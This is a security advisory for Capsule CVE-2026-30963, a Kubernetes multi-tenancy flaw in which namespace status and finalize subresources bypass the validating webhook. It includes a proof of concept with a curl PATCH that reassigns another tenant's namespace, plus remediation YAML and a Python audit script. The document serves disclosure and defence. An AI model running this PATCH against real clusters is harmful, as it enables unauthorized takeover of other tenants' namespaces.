
Capsule CVE-2026-30963

Severity: LOW (CVSS 3.1 base score 3.9)
Weakness: Improper Input Validation (CWE-20)
Date: 2026-05-28
Project: https://github.com/projectcapsule/capsule
Advisory: GHSA-2ww6-hf35-mfjm

CVSS Vector (NVD): CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L

Attack Vector: Network
Attack Complexity: High
Privileges Required: High
User Interaction: Required
Scope: Unchanged
Confidentiality: Low
Integrity: Low
Availability: Low

Lifecycle Timeline

Source Code Evidence Fetched: May 28, 2026, 17:46 (vuln.today)
Analysis Generated: May 28, 2026, 17:46 (vuln.today)

Description (NVD)

Summary

To defend against namespace hijacking achieved through update/patch operations on namespaces, Capsule uses a webhook to validate update requests targeting namespaces. However, in Kubernetes, the namespace/finalize and namespace/status subresource APIs can also modify various fields of a namespace, including the metadata field. The webhook does not define interception rules for these subresources. As a result, if a tenant administrator has permission to modify namespace/status or namespace/finalize, they can successfully perform namespace hijacking.

Details

When Capsule uses a ValidatingWebhookConfiguration to intercept changes to namespace resources, it does not intercept modification requests initiated through namespace subresource APIs (see: https://github.com/projectcapsule/capsule/blob/main/charts/capsule/templates/validatingwebhookconfiguration.yaml#L193). Through subresource APIs, it is still possible to modify the metadata field of a namespace resource, enabling hijacking.

PoC

Open two terminals and create two tenants:

kubectl create -f - << EOF
apiVersion: capsule.clastix.io/v1beta2
kind: Tenant
metadata:
  name: oil
spec:
  owners:
  - name: alice
    kind: User
EOF

./hack/create-user.sh alice solar
export KUBECONFIG=alice-solar.kubeconfig
kubectl create namespace solar-production
# alice creates the namespace
kubectl create -f - << EOF
apiVersion: capsule.clastix.io/v1beta2
kind: Tenant
metadata:
  name: attacker
spec:
  owners:
  - name: attacker
    kind: User
EOF

./hack/create-user.sh attacker attacker
export KUBECONFIG=attacker-attacker.kubeconfig

When the attacker has permission to modify namespace/status or namespace/finalize, they can hijack other namespaces. Here we grant the attacker the relevant permissions:

kubectl create clusterrole status --verb=patch --resource=namespaces/status
kubectl create clusterrolebinding status --clusterrole=status --user=attacker

The attacker then sends a PATCH request to namespace/status to hijack the namespace created by alice:

curl -k --cert ./attacker-attacker.crt --key attacker-attacker.key --request PATCH 'https://192.168.201.12:6443/api/v1/namespaces/solar-production/status' \
  --header 'Content-Type: application/json-patch+json' \
  --data '[
    {
      "op": "replace",
      "path": "/metadata/ownerReferences",
      "value": [
        {
          "apiVersion": "capsule.clastix.io/v1beta2",
          "kind": "Tenant",
          "name": "attacker",
          "uid": "1fcb9c9b-b552-4974-a248-32be66a2188c"
        }
      ]
    }
  ]'

Impact

Namespace hijacking: a tenant owner with patch rights on namespaces/status or namespaces/finalize can reassign a namespace belonging to another tenant to their own tenant, bypassing Capsule's validating webhook.

Remediation

To mitigate this issue, add the following two subresources to the resources list in the ValidatingWebhookConfiguration rules:

    resources:
    - namespaces
    - namespaces/status    # PATCH on .../namespaces/<name>/status
    - namespaces/finalize  # PATCH on .../namespaces/<name>/finalize
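To check a cluster for the gap described in the Details and Remediation sections, the following added audit script (not Capsule's code) walks the rules of a ValidatingWebhookConfiguration, mirroring the apiserver's resource-matching semantics, and reports every webhook that intercepts UPDATE on `namespaces` but not on the status/finalize subresources. The sample configuration and the webhook name in it are constructed placeholders.

```python
import copy
import json
import sys

SUBRESOURCES = ("namespaces/status", "namespaces/finalize")


def _resource_matches(pattern, resource):
    """Mirror the apiserver's rule matcher: a bare name or '*' matches only the
    main resource; 'x/y', 'x/*', '*/y' and '*/*' also match subresources."""
    p_parent, p_slash, p_sub = pattern.partition("/")
    r_parent, _, r_sub = resource.partition("/")
    if p_parent not in ("*", r_parent):
        return False
    if not p_slash:
        return r_sub == ""
    return p_sub in ("*", r_sub)


def _rule_covers(rule, resource):
    """True if the rule intercepts UPDATE (the admission operation a PATCH
    becomes) on `resource` in the core API group, where namespaces live."""
    ops, groups = set(rule.get("operations", [])), set(rule.get("apiGroups", []))
    if not ops & {"UPDATE", "*"} or not groups & {"", "*"}:
        return False
    return any(_resource_matches(p, resource) for p in rule.get("resources", []))


def uncovered_namespace_subresources(cfg):
    """Map each webhook that guards `namespaces` updates to the subresources
    it fails to intercept; an empty dict means no gap."""
    findings = {}
    for wh in cfg.get("webhooks", []):
        rules = wh.get("rules", [])
        if not any(_rule_covers(r, "namespaces") for r in rules):
            continue  # webhook is not about namespaces at all
        missing = [s for s in SUBRESOURCES if not any(_rule_covers(r, s) for r in rules)]
        if missing:
            findings[wh["name"]] = missing
    return findings


# Constructed sample with the gap; the webhook name is a placeholder, not Capsule's.
VULNERABLE = {"webhooks": [{"name": "namespaces.example.invalid", "rules": [
    {"apiGroups": [""], "apiVersions": ["v1"],
     "operations": ["CREATE", "UPDATE", "DELETE"], "resources": ["namespaces"]}]}]}
FIXED = copy.deepcopy(VULNERABLE)
FIXED["webhooks"][0]["rules"][0]["resources"] += list(SUBRESOURCES)

if __name__ == "__main__":
    # Pipe in: kubectl get validatingwebhookconfigurations <name> -o json
    print(json.dumps(uncovered_namespace_subresources(json.load(sys.stdin)), indent=2))
```

Run against real cluster output, a non-empty result names the webhooks whose rules still need the two subresources added.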

Analysis (AI-generated)

Namespace hijacking in Capsule (Kubernetes multi-tenancy operator) prior to v0.13.0 allows an authenticated tenant administrator to reassign any namespace to their own tenant by patching it through the namespace/status or namespace/finalize subresource APIs, which bypass Capsule's ValidatingWebhookConfiguration enforcement entirely. The webhook intercepts direct namespace modifications but omits these subresource paths, leaving a gap that an attacker with explicitly delegated RBAC permissions can exploit with a single PATCH request. …
